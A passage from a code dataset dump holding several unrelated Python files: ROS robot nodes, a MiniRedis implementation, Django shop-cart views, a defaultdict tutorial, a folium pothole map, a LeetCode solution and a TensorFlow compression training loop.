geometry_msgs.msg.PoseStamped()\n odom_pose_base_link.pose.position = translation_base_link.vector\n odom_pose_base_link.pose.orientation.x = rotation_vector_base_link.vector.x\n odom_pose_base_link.pose.orientation.y = rotation_vector_base_link.vector.y\n odom_pose_base_link.pose.orientation.z = rotation_vector_base_link.vector.z\n odom_pose_base_link.pose.orientation.w = odom.pose.pose.orientation.w\n \n odom_pose_base_link.pose.position.y += counter * 0.005\n counter += 1\n\n odom_to_base_link = geometry_msgs.msg.TransformStamped()\n odom_to_base_link.header.stamp = odom.header.stamp\n odom_to_base_link.header.frame_id = 'odom'\n odom_to_base_link.child_frame_id = 'base_link'\n odom_to_base_link.transform.translation = odom_pose_base_link.pose.position\n odom_to_base_link.transform.rotation = odom_pose_base_link.pose.orientation\n tfBroadcaster.sendTransform(odom_to_base_link)\n\n odom_base_link = odom\n odom_base_link.header.frame_id = 'odom'\n odom_base_link.pose.pose = odom_pose_base_link.pose\n odom_publisher.publish(odom_base_link)\n\n\nif __name__ == '__main__':\n rospy.init_node('openvslam_odom_to_base_link_with_drift')\n counter = 0\n tfBroadcaster = tf2_ros.TransformBroadcaster()\n tfBuffer = tf2_ros.Buffer()\n tfListener = tf2_ros.TransformListener(tfBuffer)\n rospy.Subscriber('/OpenVSLAM/odom', Odometry, odom_received)\n odom_publisher = rospy.Publisher('/OpenVSLAM/odom_base_link_with_drift', Odometry, queue_size=10)\n rospy.spin()\n \n","sub_path":"occupancy_grid_mapping/rtabmap_example/scripts/openvslam_odom_to_base_link_with_drift.py","file_name":"openvslam_odom_to_base_link_with_drift.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"327293556","text":"#!/usr/bin/env python\n# import roslib;roslib.load_manifest('dynamixel_tutorials')\nimport roslib;roslib.load_manifest('conbe')\nimport rospy\nfrom std_msgs.msg import Float64\nimport time\n\n\n#need to get current position of moter in radians\n\nif __name__ ==\"__main__\":\n rospy.init_node(\"Publisher\")\n pub = rospy.Publisher('/joint2_controller/command', Float64)\n r = rospy.Rate(10)\n\n def dxl_move(start,stop):\n if(start < stop):\n for deg in range (start,stop):\n print('control : ',deg, '[deg]')\n int = deg*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n else:\n for deg in range(start-stop):\n print('control : ',start-deg, '[deg]')\n int = (start-deg)*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n\n def dxl_move_goal(deg):\n print('control : ',deg, '[deg]')\n int = deg*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n\n\n if not rospy.is_shutdown():\n # dxl_move(0,10)\n # time.sleep(5)\n # dxl_move(45,-45)\n # dxl_move(-45,45)\n\n dxl_move_goal(0)\n time.sleep(3)\n dxl_move_goal(90)\n time.sleep(3)\n dxl_move_goal(-90)\n time.sleep(3)\n dxl_move_goal(0)\n\n # counter = -90\n # i=0\n # while (True):\n # int = counter*3.14/180 #Converting degrees to radians.\n # pub.publish(int)\n # #This part ensures that the input is sent continously clockwise and anti-clockwise.\n # if(counter == 90):\n # i = 1\n # break # otherwise infinite roop \n # elif(counter == -90):\n # i=0\n # if(i==1):\n # counter-=1\n # elif(i==0):\n # counter+=1\n # r.sleep()","sub_path":"dynamixel_motor/conbe/scripts/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"37602436","text":"import logging\n\nfrom structures import *\n\nlog = logging.getLogger(__name__)\n\n\ndef redis_set_to_list(dic):\n return [str(x) for _, x in sorted(zip(dic.values(), dic.keys()))]\n\n\nclass MiniRedis(object):\n\n def __init__(self):\n self.db = ThreadSafeDict()\n self.tasks = ThreadSafeDict()\n\n def delete_timer(self, key):\n print(\"deleting key {}\".format(key))\n self.delete(key)\n\n def set(self, key, value, seconds=None):\n if key is None or value is None:\n return ERROR_ARGUMENT\n if seconds is not None:\n try:\n seconds = int(str(seconds))\n except (KeyError, TypeError, ValueError):\n return ERROR_INTEGER\n if seconds < 1:\n return ERROR_EXPIRE\n with self.db as db:\n with self.tasks as tasks:\n if key in tasks:\n tasks[key].cancel()\n del tasks[key]\n db[key] = value\n if seconds is not None:\n new_task = threading.Timer(seconds, self.delete, args=[key])\n new_task.start()\n tasks[key] = new_task\n return OK_VALUE\n\n def get(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n value = db.get(key)\n if isinstance(value, dict):\n return ERROR_WRONG_TYPE\n if value is not None:\n return value\n else:\n return EMPTY_VALUE\n\n def delete(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n if key not in db:\n return 0\n with self.tasks as task:\n if key in task:\n task[key].cancel()\n del task[key]\n del db[key]\n return 1\n\n def db_size(self):\n with self.db as db:\n return len(db)\n\n def incr(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n val = db.get(key)\n if val is None:\n val = 0\n try:\n val = int(str(val)) + 1\n db[key] = str(val)\n return val\n except (KeyError, TypeError, ValueError):\n return ERROR_INTEGER\n\n def zadd(self, key, score, member):\n try:\n score = float(str(score))\n except (KeyError, TypeError, ValueError):\n return ERROR_FLOAT\n if key is None or score is None or member is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n z = {}\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n if member in z:\n val = 0\n else:\n val = 1\n z[member] = score\n db[key] = z\n return val\n\n def zcard(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return 0\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n return len(z)\n\n def zrank(self, key, member):\n if key is None or member is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return EMPTY_VALUE\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n if member in z:\n return redis_set_to_list(z).index(member)\n else:\n return EMPTY_VALUE\n\n def zrange(self, key, start, stop):\n try:\n start = int(str(start))\n stop = int(str(stop))\n except (KeyError, TypeError, ValueError):\n return ERROR_INTEGER\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return EMPTY_LIST\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n zlist = redis_set_to_list(z)\n size = len(zlist)\n if start < 0:\n start = size + start\n if stop < 0:\n stop = size + stop\n result = zlist[start:stop + 1]\n if not result:\n return EMPTY_LIST\n else:\n return result\n","sub_path":"miniredis/miniredis.py","file_name":"miniredis.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624280153","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom order.models import *\nfrom product.models import *\nfrom user.models import *\nfrom django.utils.crypto import get_random_string\nfrom django.contrib.auth.decorators import login_required\n\n\n\n# Create your views here.\n@login_required(login_url='/login') # Check login\ndef user(request):\n category = Category.objects.all()\n current_user = request.user # Access User Session information\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'category': category,\n 'profile':profile}\n return render(request,'user_profile.html',context)\n\n@login_required(login_url='/login')\ndef addtoshopcart(request,id):\n url = request.META.get('HTTP_REFERER')\n current_user=request.user\n\n checkproduct=Shopcart.objects.filter(product_id=id)\n if checkproduct:\n control = 1\n else:\n control = 0\n\n if request.method == 'POST':\n form = ShopcartForm(request.POST)\n if form.is_valid():\n if control == 1:\n data = Shopcart.objects.get(product_id=id)\n data.quantity += form.cleaned_data['quantity']\n data.save()\n else:\n data = Shopcart()\n data.user_id=current_user.id\n data.product_id = id\n data.quantity = form.cleaned_data['quantity']\n data.save()\n messages.success(request,\"Product added to shop cart successfully\")\n return HttpResponseRedirect(url)\n else:\n if control == 1:\n data = Shopcart.objects.get(product_id=id)\n data.quantity += 1\n data.save()\n else:\n data = Shopcart()\n data.user_id=current_user.id\n data.product_id = id\n data.quantity = 1\n data.save()\n messages.success(request,\"Product added to shop cart successfully\")\n return HttpResponseRedirect(url)\ndef shopcart(request):\n category=Category.objects.all()\n current_user=request.user\n shopcart=Shopcart.objects.filter(user_id=current_user.id)\n total=0\n for rs in shopcart:\n total += rs.product.price * rs.quantity\n context={\n 'category':category,\n 'shopcart':shopcart,\n 'total':total,\n }\n return render(request,'shopcart_products.html',context)\n\n@login_required(login_url='/login')\ndef deletefromcart(request,id):\n Shopcart.objects.filter(id=id).delete()\n messages.success(request,\"Your Item Deleted from Cart.\")\n return HttpResponseRedirect('/shopcart')\ndef orderproduct(request):\n category = Category.objects.all()\n current_user = request.user\n shopcart = Shopcart.objects.filter(user_id=current_user.id)\n total = 0\n for rs in shopcart:\n total += rs.product.price * rs.quantity\n\n if request.method == 'POST': # if there is a post\n form = OrderForm(request.POST)\n #return HttpResponse(request.POST.items())\n if form.is_valid():\n # Send Credit card to bank, If the bank responds ok, continue, if not, show the error\n # ..............\n\n data = Order()\n data.first_name = form.cleaned_data['first_name'] #get product quantity from form\n data.last_name = form.cleaned_data['last_name']\n data.address = form.cleaned_data['address']\n data.city = form.cleaned_data['city']\n data.phone = form.cleaned_data['phone']\n data.user_id = current_user.id\n data.total = total\n data.ip = request.META.get('REMOTE_ADDR')\n ordercode= get_random_string(5).upper() # random cod\n data.code = ordercode\n data.save() #\n\n\n for rs in shopcart:\n detail = OrderProduct()\n detail.order_id = data.id # Order Id\n detail.product_id = rs.product_id\n detail.user_id = current_user.id\n detail.quantity = rs.quantity\n\n detail.price = rs.product.price\n\n #detail.variant_id = rs.variant_id\n detail.amount = rs.amount\n detail.save()\n # ***Reduce quantity of sold product from Amount of Product\n #if rs.product.variant=='None':\n product = Product.objects.get(id=rs.product_id)\n product.amount -= rs.quantity\n product.save()\n # else:\n # variant = Variants.objects.get(id=rs.product_id)\n # variant.quantity -= rs.quantity\n # variant.save()\n #************ <> *****************\n\n Shopcart.objects.filter(user_id=current_user.id).delete() # Clear & Delete shopcart\n request.session['cart_items']=0\n messages.success(request, \"Your Order has been completed. Thank you \")\n return render(request, 'completed_order.html',{'ordercode':ordercode,'category': category})\n else:\n messages.warning(request, form.errors)\n return HttpResponseRedirect(\"/order/orderproduct\")\n\n form= OrderForm()\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'shopcart': shopcart,\n 'category': category,\n 'total': total,\n 'form': form,\n 'profile': profile,\n }\n return render(request, 'order_form.html', context)\n","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264303472","text":"from collections import defaultdict\r\n\r\n'''\r\nFor example, the list type’s sort method takes an optional key argument\r\nthat’s used to determine each index’s value for sorting.\r\nHere, I sort a list of names based on their lengths by providing a\r\nlambda expression as the key hook:\r\n'''\r\n\r\nnames = ['Socrates', 'Archimedes', 'Plato', 'Aristotle']\r\nnames.sort(key=lambda x: len(x))\r\nprint(names) # ['Plato', 'Socrates', 'Aristotle', 'Archimedes']\r\n\r\ndef log_missing():\r\n print('Key added')\r\n return 0\r\n\r\ncurrent = {'green': 12, 'blue': 3}\r\nincrements = [\r\n ('red', 5),\r\n ('blue', 17),\r\n ('orange', 9),\r\n]\r\nresult = defaultdict(log_missing, current)\r\nprint('Before:', dict(result))\r\nfor key, amount in increments:\r\n result[key] += amount\r\nprint('After: ', dict(result))\r\n\r\n'''\r\nBefore: {'green': 12, 'blue': 3}\r\nKey added\r\nKey added\r\nAfter: {'orange': 9, 'green': 12, 'blue': 20, 'red': 5}\r\n'''\r\n\r\ndef increment_with_report(current, increments):\r\n added_count = 0\r\n\r\n def missing():\r\n nonlocal added_count # Stateful closure\r\n added_count += 1\r\n return 0\r\n\r\n result = defaultdict(missing, current)\r\n for key, amount in increments:\r\n result[key] += amount\r\n\r\n return result, added_count\r\n\r\nresult, count = increment_with_report(current, increments)\r\nassert count == 2\r\n\r\n'''\r\nThe problem with defining a closure for stateful hooks is that it’s harder\r\nto read than the stateless function example. Another approach is\r\nto define a small class that encapsulates the state you want to track.\r\n'''\r\n\r\nclass CountMissing(object):\r\n def __init__(self):\r\n self.added = 0\r\n\r\n def missing(self):\r\n self.added += 1\r\n return 0\r\n\r\ncounter = CountMissing()\r\nresult = defaultdict(counter.missing, current) # Method ref\r\n\r\nfor key, amount in increments:\r\n result[key] += amount\r\nassert counter.added == 2\r\n\r\n# but not clear\r\n\r\n# Python allows classes to define the __call__ special method.\r\n# __call__ allows an object to be called just like a function.\r\n# It also causes the callable built-in function to return True for such an instance.\r\n\r\nclass BetterCountMissing(object):\r\n def __init__(self):\r\n self.added = 0\r\n\r\n def __call__(self):\r\n self.added += 1\r\n return 0\r\n\r\ncounter = BetterCountMissing()\r\ncounter()\r\nassert callable(counter)\r\n\r\ncounter = BetterCountMissing()\r\nresult = defaultdict(counter, current) # Relies on __call__\r\nfor key, amount in increments:\r\n result[key] += amount\r\nassert counter.added == 2\r\n\r\n# It provides a strong hint that the goal of the class is to act as a stateful closure.\r\n\r\n# When you need a function to maintain state, consider defining a class that\r\n# provides the __call__ method instead of defining a stateful closure\r\n","sub_path":"TUTORIAL_CODE/044_accept_functions_instead_of_classes_also_defaultdict_call_method.py","file_name":"044_accept_functions_instead_of_classes_also_defaultdict_call_method.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135392762","text":"import pandas as pd\nimport geopandas as gpd\nfrom shapely.geometry import Point, LineString, Polygon\nimport folium\nimport numpy as np\nimport flask as Flask\n\n\nplotholes=pd.read_csv('./templates/potholes.csv.html',index_col=None)\nlocations=[]\ncolumns=['image','latitude','longitude','depth','width','location','fixed']\n\nfor index,row in plotholes.iterrows(): \n location = [float(row[2]), float(row[3])]\n locations+=location\nplothole_map = folium.Map(location =[np.mean(location[:][0]),np.mean(location[:][1])] ,zoom_start=16.5)\n#create a marker for each school\nfor index,row in plotholes.iterrows(): \n location = [float(row[2]), float(row[3])] \n popup_string=''\n for i in range(4,8):\n popup_string+=columns[i-1]+': '+str(row[i])+'
'\n popup = folium.Popup(popup_string,max_width=450)\n marker = folium.Marker(location = location, popup=popup) \n marker.add_to(plothole_map)\n\nplothole_map.save(\"./templates/my.html\")\n","sub_path":"blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582351359","text":"from math import *\r\n\r\n\r\ndef actualise(R,v,position,obj,orientation,deltat,amaxlat,epsilonmax,amax,amin,tsb,l,vmax,N):\r\n #calcul vrai rayon courbure\r\n R=abs(R)\r\n Rprim=max(R,tsb*v**2/(epsilonmax*2*pi/360)+l/(epsilonmax*2*pi/360),sqrt(v**2/amaxlat))\r\n xobj=obj[0]\r\n yobj=obj[1] \r\n \r\n #calcul coordonnées du pt atteint apres deltat dans ref lidar\r\n xprim=0\r\n yprim=0\r\n xprim1=0\r\n yprim1=0\r\n thetaparc=0\r\n if v!=0:\r\n thetaparc=atan(xobj/(Rprim-abs(yobj)))\r\n yprim=Rprim*(1-cos(thetaparc))\r\n xprim=(Rprim-yprim)*sin(thetaparc)\r\n \r\n if yobj<0:\r\n yprim=-yprim\r\n \r\n #débugage\r\n #thetaparc=atan(yobj/xobj)\r\n #xprim=xobj\r\n #yprim=yobj \r\n print('xobj',xobj)\r\n print('yobj',yobj)\r\n print('xprim',xprim)\r\n print('yprim',yprim)\r\n \r\n \r\n \r\n rprim=sqrt(xprim**2+yprim**2)\r\n \r\n alphainc=360/N\r\n xprim1=rprim*cos(thetaparc+orientation*2*pi/360) #correction en angle? \r\n yprim1=rprim*sin(thetaparc+orientation*2*pi/360)\r\n \r\n \r\n #calcul coordonnées du pt atteint apres deltat dans ref abs\r\n xabs=xprim1+position[0]\r\n yabs=yprim1+position[1]\r\n \r\n positionprim=[xabs,yabs]\r\n \r\n #calc nouvelle orientation\r\n alphainc=360/N\r\n orientationprim=orientation+thetaparc*360/(2*pi)\r\n #if obj[1]vmaxr:\r\n a=min(1,(vmaxr-v)/(deltat*amin))*amin\r\n \r\n vprim=min(vmax,v+a*deltat)\r\n \r\n return(positionprim,orientationprim,vprim)\r\n ","sub_path":"voiture-Autonome-2020-2021/code/actualise.py","file_name":"actualise.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162381907","text":"class Solution:\n def minReorder(self, n, connections):\n from collections import defaultdict,deque\n \n undirected_graph = defaultdict(list)\n actual_graph = defaultdict(set)\n\n for a,b in connections:\n undirected_graph[a].append(b)\n undirected_graph[b].append(a)\n actual_graph[a].add(b) \n # queue = [(1,0),(4,0)]\n # queue structure is (node, destination)\n queue = deque()\n for node in undirected_graph[0]:\n queue.append((node,0))\n # print(queue)\n res = 0\n visited = set([0])\n \n while queue:\n current, destination_node = queue.popleft()\n visited.add(current)\n if (destination_node not in actual_graph[current]):\n print(f\"Add edge b/w {current} and {destination_node}\")\n res += 1\n for nei in undirected_graph[current]:\n if nei not in visited:\n queue.append((nei, current))\n return res\n\nobj = Solution()\nprint(obj.minReorder(6,[[0,1],[1,3],[2,3],[4,0],[4,5]]))","sub_path":"1466-Reorder-Routes-to-Make-All-Paths-Lead-to-the-City-Zero.py","file_name":"1466-Reorder-Routes-to-Make-All-Paths-Lead-to-the-City-Zero.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539917755","text":"import os\nimport tqdm\nimport json\nimport imageio\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import deque\nfrom skimage.transform import resize, rescale\nfrom skimage.measure import compare_ssim as ssim\n\nimport matplotlib.pyplot as plt\n\n# Own libraries and modules\nfrom helpers import plotting, summaries, utils\n\n\ndef visualize_distribution(dcn, data, ax=None, title=None):\n\n title = '' if title is None else title+' '\n\n if type(data) is not np.ndarray:\n sample_batch_size = np.min((100, data.count_validation))\n batch_x = data.next_validation_batch(0, sample_batch_size)\n else:\n batch_x = data\n\n # Fetch latent distribution for the current batch\n batch_z = dcn.compress(batch_x)\n batch_z = batch_z.reshape((-1,)).T\n\n # Get current version of the quantization codebook\n codebook = dcn.get_codebook().tolist()\n\n # Find x limits for plotting\n if dcn._h.rounding == 'identity':\n qmax = np.ceil(np.max(np.abs(batch_z)))\n qmin = -qmax\n else:\n qmin = np.floor(codebook[0])\n qmax = np.ceil(codebook[-1])\n\n feed_dict = {dcn.x: batch_x}\n if hasattr(dcn, 'is_training'):\n feed_dict[dcn.is_training] = True\n\n # Get approximation of the soft quantization structures used for entropy estimation\n histogram = dcn.sess.run(dcn.histogram, feed_dict=feed_dict).reshape((-1,))\n histogram = histogram / histogram.max()\n histogram = histogram.reshape((-1)).tolist()\n\n # Create a dense version of the quantization bins\n bin_centers = np.arange(qmin - 1, qmax + 1, 0.1)\n bin_boundaries = np.convolve(bin_centers, [0.5, 0.5], mode='valid')\n bin_centers = bin_centers[1:-1]\n\n # Compute empirical histogram based on latent representation\n hist = np.histogram(batch_z, bins=bin_boundaries, density=True)[0]\n hist = hist / hist.max()\n\n entropy = utils.entropy(batch_z, codebook)\n\n ticks = np.unique(np.round(np.percentile(batch_z, [1, 5, 25, 50, 75, 95, 99])))\n\n if ax is None:\n fig = plt.figure(figsize=(10, 2))\n ax = fig.gca()\n\n ax.set_xlim([qmin - 1, qmax + 1])\n ax.set_xticks(ticks)\n ax.stem(bin_centers, hist, linefmt='r:', markerfmt='r.') # width=bin_centers[1] - bin_centers[0]\n ax.bar(codebook, histogram, width=(codebook[1] - codebook[0]) / 2, color='b', alpha=0.5)\n ax.set_title('{}QLR histogram (H={:.1f})'.format(title, entropy))\n ax.legend(['Quantized values', 'Soft estimate'], loc='upper right')\n\n # Render the plot as a PNG image and return a bitmap array\n return ax.figure\n\n\ndef visualize_codebook(dcn):\n qmin = -2 ** (dcn.latent_bpf - 1) + 1\n qmax = 2 ** (dcn.latent_bpf - 1)\n\n uniform_cbook = np.arange(qmin, qmax + 1)\n codebook = dcn.get_codebook().tolist()\n\n fig = plt.figure(figsize=(10, 1))\n\n for x1, x2 in zip(codebook, uniform_cbook):\n fig.gca().plot([x1, x2], [0, 1], 'k:')\n\n fig.gca().plot(codebook, np.zeros_like(codebook), 'x')\n fig.gca().plot(uniform_cbook, np.ones_like(uniform_cbook), 'ro')\n fig.gca().set_ylim([-1, 2])\n fig.gca().set_xlim([qmin - 1, qmax + 1])\n fig.gca().set_yticks([])\n fig.gca().set_xticks(uniform_cbook)\n\n # Render the plot as a PNG image and return a bitmap array\n return fig\n\n\ndef save_progress(dcn, data, training, out_dir):\n filename = os.path.join(out_dir, 'progress.json')\n\n output_stats = {\n 'training_spec': training,\n 'data': data.summary(),\n 'dcn': {\n 'model': type(dcn).__name__,\n 'args': dcn.get_parameters(),\n 'codebook': dcn.get_codebook().tolist()\n },\n 'performance': dcn.performance,\n }\n\n with open(filename, 'w') as f:\n json.dump(output_stats, f, indent=4)\n\n\ndef train_dcn(tf_ops, training, data, directory='./data/models/dcn/playground/', overwrite=False):\n \"\"\"\n tf_ops = {\n 'dcn'\n }\n\n training {\n\n 'augmentation_probs': {\n 'resize': 0.0,\n 'flip_h': 0.5,\n 'flip_v': 0.5\n }\n }\n\n \"\"\"\n\n dcn = tf_ops['dcn']\n dcn.init()\n\n # Compute the number of available batches\n n_batches = data['training']['y'].shape[0] // training['batch_size']\n v_batches = data['validation']['y'].shape[0] // training['batch_size']\n\n # Structures for storing performance stats\n perf = dcn.performance\n\n caches = {\n 'loss': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)},\n 'entropy': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)},\n 'ssim': {'training': deque(maxlen=n_batches), 'validation': deque(maxlen=v_batches)}\n }\n\n n_tail = 5\n learning_rate = training['learning_rate']\n model_output_dirname = os.path.join(directory, dcn.model_code, dcn.scoped_name)\n \n if os.path.isdir(model_output_dirname) and not overwrite:\n return\n\n print('Output directory: {}'.format(model_output_dirname))\n\n # Create a summary writer and create the necessary directories\n sw = dcn.get_summary_writer(model_output_dirname)\n\n with tqdm.tqdm(total=training['n_epochs'], ncols=160, desc=dcn.model_code.split('/')[-1]) as pbar:\n\n for epoch in range(0, training['n_epochs']):\n\n training['current_epoch'] = epoch\n\n if epoch > 0 and epoch % training['learning_rate_reduction_schedule'] == 0:\n learning_rate *= training['learning_rate_reduction_factor']\n\n # Iterate through batches of the training data\n for batch_id in range(n_batches):\n\n # Pick random patch size - will be resized later for augmentation\n current_patch = np.random.choice(np.arange(training['patch_size'], 2 * training['patch_size']),\n 1) if np.random.uniform() < training['augmentation_probs'][\n 'resize'] else training['patch_size']\n\n # Sample next batch\n batch_x = data.next_training_batch(batch_id, training['batch_size'], current_patch)\n\n # If rescaling needed, apply\n if training['patch_size'] != current_patch:\n batch_t = np.zeros((batch_x.shape[0], training['patch_size'], training['patch_size'], 3),\n dtype=np.float32)\n for i in range(len(batch_x)):\n batch_t[i] = resize(batch_x[i], [training['patch_size'], training['patch_size']],\n anti_aliasing=True)\n batch_x = batch_t\n\n # Data augmentation - random horizontal flip\n if np.random.uniform() < training['augmentation_probs']['flip_h']: batch_x = batch_x[:, :, ::-1, :]\n if np.random.uniform() < training['augmentation_probs']['flip_v']: batch_x = batch_x[:, ::-1, :, :]\n if np.random.uniform() < training['augmentation_probs']['gamma']: batch_x = utils.batch_gamma(batch_x)\n\n # Sample dropout\n keep_prob = 1.0 if not training['sample_dropout'] else np.random.uniform(0.5, 1.0)\n\n # Make a training step\n values = dcn.training_step(batch_x, learning_rate, dropout_keep_prob=keep_prob)\n\n # TODO temporary nan hook\n if np.isnan(values['loss']):\n print('NaN loss detected - dumping current variables')\n codebook = dcn.get_codebook()\n # Get some extra stats\n if dcn.scale_latent:\n scaling = dcn.sess.run(\n dcn.graph.get_tensor_by_name('{}/encoder/latent_scaling:0'.format(dcn.scoped_name)))\n else:\n scaling = np.nan\n print('Scaling: {}'.format(scaling))\n print('Codebook: {}'.format(codebook.tolist()))\n # Dump all variables to check which is nan\n for var in dcn.parameters:\n if np.any(np.isnan(dcn.sess.run(var))):\n nan_perc = np.mean(np.isnan(dcn.sess.run(var)))\n print('!! NaNs found in {} --> {}'.format(var.name, nan_perc))\n return None\n\n for key, value in values.items():\n caches[key]['training'].append(value)\n\n # Record average values for the whole epoch\n for key in ['loss', 'ssim', 'entropy']:\n perf[key]['training'].append(float(np.mean(caches[key]['training'])))\n\n # Get some extra stats\n if dcn.scale_latent:\n scaling = dcn.sess.run(\n dcn.graph.get_tensor_by_name('{}/encoder/latent_scaling:0'.format(dcn.scoped_name)))\n else:\n scaling = np.nan\n\n codebook = dcn.get_codebook()\n\n # Iterate through batches of the validation data\n if epoch % training['validation_schedule'] == 0:\n\n for batch_id in range(v_batches):\n batch_x = data.next_validation_batch(batch_id, training['batch_size'])\n batch_z = dcn.compress(batch_x, is_training=training['validation_is_training'])\n batch_y = dcn.decompress(batch_z)\n\n # Compute loss\n loss_value = np.linalg.norm(batch_x - batch_y)\n caches['loss']['validation'].append(loss_value)\n\n # Compute SSIM\n ssim_value = np.mean([ssim(batch_x[r], batch_y[r], multichannel=True, data_range=1.0) for r in range(len(batch_x))])\n caches['ssim']['validation'].append(ssim_value)\n\n # Entropy\n entropy_value = utils.entropy(batch_z, codebook)\n caches['entropy']['validation'].append(entropy_value)\n\n for key in ['loss', 'ssim', 'entropy']:\n perf[key]['validation'].append(float(np.mean(caches[key]['validation'])))\n\n # Save current snapshot\n indices = np.argsort(np.var(batch_x, axis=(1, 2, 3)))[::-1]\n thumbs_pairs_all = np.concatenate((batch_x[indices[::2]], batch_y[indices[::2]]), axis=0)\n thumbs_pairs_few = np.concatenate((batch_x[indices[:5]], batch_y[indices[:5]]), axis=0)\n thumbs = (255 * plotting.thumbnails(thumbs_pairs_all, n_cols=training['batch_size'] // 2)).astype(np.uint8)\n thumbs_few = (255 * plotting.thumbnails(thumbs_pairs_few, n_cols=5)).astype(np.uint8)\n imageio.imsave(os.path.join(model_output_dirname, 'thumbnails-{:05d}.png'.format(epoch)), thumbs)\n\n # Sample latent space\n batch_z = dcn.compress(batch_x)\n\n # Save summaries to TB\n summary = tf.Summary()\n summary.value.add(tag='loss/validation', simple_value=perf['loss']['validation'][-1])\n summary.value.add(tag='loss/training', simple_value=perf['loss']['training'][-1])\n summary.value.add(tag='ssim/validation', simple_value=perf['ssim']['validation'][-1])\n summary.value.add(tag='ssim/training', simple_value=perf['ssim']['training'][-1])\n summary.value.add(tag='entropy/training', simple_value=perf['entropy']['training'][-1])\n summary.value.add(tag='scaling', simple_value=scaling)\n summary.value.add(tag='images/reconstructed',\n image=summaries.log_image(rescale(thumbs_few, 1.0, anti_aliasing=True)))\n summary.value.add(tag='histograms/latent', histo=summaries.log_histogram(batch_z))\n summary.value.add(tag='histograms/latent_approx',\n image=summaries.log_plot(visualize_distribution(dcn, data)))\n\n if dcn.train_codebook:\n summary.value.add(tag='codebook/min', simple_value=codebook.min())\n summary.value.add(tag='codebook/max', simple_value=codebook.max())\n summary.value.add(tag='codebook/mean', simple_value=codebook.mean())\n summary.value.add(tag='codebook/diff_variance',\n simple_value=np.var(np.convolve(codebook, [-1, 1], mode='valid')))\n summary.value.add(tag='codebook/centroids', image=summaries.log_plot(visualize_codebook(dcn)))\n\n sw.add_summary(summary, epoch)\n sw.flush()\n\n # Save stats to a JSON log\n save_progress(dcn, data, training, model_output_dirname)\n\n # Save current checkpoint\n dcn.save_model(model_output_dirname, epoch)\n\n # Check for convergence or model deterioration\n if len(perf['ssim']['validation']) > 5:\n current = np.mean(perf['ssim']['validation'][-n_tail:])\n previous = np.mean(perf['ssim']['validation'][-(n_tail + 1):-1])\n perf_change = abs((current - previous) / previous)\n\n if perf_change < training['convergence_threshold']:\n print('Early stopping - the model converged, validation SSIM change {:.4f}'.format(perf_change))\n break\n\n if current < 0.9 * previous:\n print('Error - SSIM deterioration by more than 10% {:.4f} -> {:.4f}'.format(previous, current))\n break\n\n progress_dict = {\n 'L': np.mean(perf['loss']['training'][-3:]),\n 'Lv': np.mean(perf['loss']['validation'][-1:]),\n 'lr': '{:.1e}'.format(learning_rate),\n 'ssim': '{:.2f}'.format(perf['ssim']['validation'][-1]),\n 'H': '{:.1f}'.format(np.mean(perf['entropy']['training'][-1:])),\n }\n\n if dcn.scale_latent:\n progress_dict['S'] = '{:.1f}'.format(scaling)\n\n if dcn.use_batchnorm:\n # Get current batch / population stats\n prebn = dcn.sess.run(dcn.pre_bn, feed_dict={dcn.x: batch_x})\n bM = np.mean(prebn, axis=(0, 1, 2))\n bV = np.var(prebn, axis=(0, 1, 2))\n pM = dcn.sess.run(dcn.graph.get_tensor_by_name('{}/encoder/bn_0/moving_mean:0'.format(dcn.scoped_name)))\n pV = dcn.sess.run(dcn.graph.get_tensor_by_name('{}/encoder/bn_0/moving_variance:0'.format(dcn.scoped_name)))\n\n # Append summary\n progress_dict['MVp'] = '{:.2f}/{:.2f}'.format(np.mean(pM), np.mean(pV))\n progress_dict['MVb'] = '{:.2f}/{:.2f}'.format(np.mean(bM), np.mean(bV))\n\n # Update progress bar\n pbar.set_postfix(progress_dict)\n 